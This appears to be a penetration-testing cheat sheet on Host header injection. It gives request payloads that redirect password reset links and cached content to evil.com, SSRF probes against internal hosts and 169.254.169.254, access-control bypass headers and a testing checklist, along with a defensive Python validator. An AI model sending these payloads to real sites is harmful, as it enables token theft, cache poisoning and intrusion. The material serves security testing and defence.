
Host Header Attacks

Host header injection and web cache poisoning

Basic Host Header Injection

```http
# Password reset poisoning
GET /reset-password?email=victim@target.com HTTP/1.1
Host: evil.com

# Victim receives reset link with evil.com
```

Injection Techniques

Standard Injection

```http
Host: evil.com
```

Override Headers

```http
Host: target.com
X-Forwarded-Host: evil.com
X-Host: evil.com
X-Forwarded-Server: evil.com
X-Original-URL: /admin
X-Rewrite-URL: /admin
```

Absolute URL

```http
GET https://evil.com/path HTTP/1.1
Host: target.com
```

Port Injection

```http
Host: target.com:evil.com
Host: target.com:@evil.com
```

Duplicate Headers

```http
Host: target.com
Host: evil.com
```

Web Cache Poisoning

```http
# Poison cached response
GET /static/script.js HTTP/1.1
Host: target.com
X-Forwarded-Host: evil.com

# Response includes evil.com in content
# Cache stores poisoned response
```

Common Vulnerabilities

Password Reset

```text
1. Request password reset
2. Intercept, modify Host to evil.com
3. Victim clicks link → token sent to attacker
```
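Server-side validation that closes the flow above, added here as a defensive example and not code from this page: the reset link is built from a configured canonical origin rather than from the request, and the request's authority is validated against an allowlist so the port-injection, duplicate-header, absolute-URL and override-header forms from the earlier sections are refused. `CANONICAL_ORIGIN`, `ALLOWED_HOSTS` and the function names are assumptions for the example.

```python
import re
from urllib.parse import urlsplit

# Assumed deployment values (not from the page): the app's canonical public
# origin and the hostnames it is willing to serve.
CANONICAL_ORIGIN = "https://target.com"
ALLOWED_HOSTS = {"target.com", "www.target.com"}

# Hostname labels plus an optional numeric port; '@', a second ':' or a path
# fails to match, which covers the port-injection forms shown above.
_LABEL = r"[a-z0-9](?:[a-z0-9-]*[a-z0-9])?"
_HOST_RE = re.compile(rf"^({_LABEL}(?:\.{_LABEL})*)(?::\d{{1,5}})?$")

class BadHost(ValueError):
    pass

def effective_host(request_target, headers, from_trusted_proxy=False):
    """Return the validated hostname the request is addressed to.
    `headers` is a list of (name, value) pairs so duplicates stay visible; an
    absolute-form request-target overrides Host; X-Forwarded-Host counts only
    behind a proxy we control, otherwise override headers are ignored.
    """
    hosts = [v for n, v in headers if n.lower() == "host"]
    if len(hosts) != 1:                     # missing or duplicated Host header
        raise BadHost("expected exactly one Host header")
    candidate = hosts[0]
    if request_target.lower().startswith(("http://", "https://")):
        candidate = urlsplit(request_target).netloc
    if from_trusted_proxy:
        forwarded = [v for n, v in headers if n.lower() == "x-forwarded-host"]
        if forwarded:
            candidate = forwarded[-1]
    m = _HOST_RE.match(candidate.strip().lower())
    if not m or m.group(1) not in ALLOWED_HOSTS:
        raise BadHost(f"rejected Host value: {candidate!r}")
    return m.group(1)

def is_rejected(request_target, headers, from_trusted_proxy=False):
    """True when the validator refuses the request; a signal worth alerting on."""
    try:
        effective_host(request_target, headers, from_trusted_proxy)
    except BadHost:
        return True
    return False

def build_reset_link(request_target, headers, token):
    """Build the reset link from configuration, never from request headers."""
    effective_host(request_target, headers)  # refuse poisoned requests outright
    return f"{CANONICAL_ORIGIN}/reset-password?token={token}"
```

Logging every `BadHost` rejection gives a cheap detection signal for the probing described on this page.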

SSRF via Host

```http
Host: internal-server.local
Host: 169.254.169.254
```

Access Control Bypass

```http
X-Original-URL: /admin
X-Rewrite-URL: /admin
```

Headers to Test

```text
Host
X-Forwarded-Host
X-Host
X-Forwarded-Server
X-HTTP-Host-Override
Forwarded
X-Original-URL
X-Rewrite-URL
```

Testing Checklist

```text
□ Test Host header modification
□ Try X-Forwarded-Host
□ Test absolute URL in request line
□ Check password reset flow
□ Test web cache behavior
□ Try access control bypass headers
```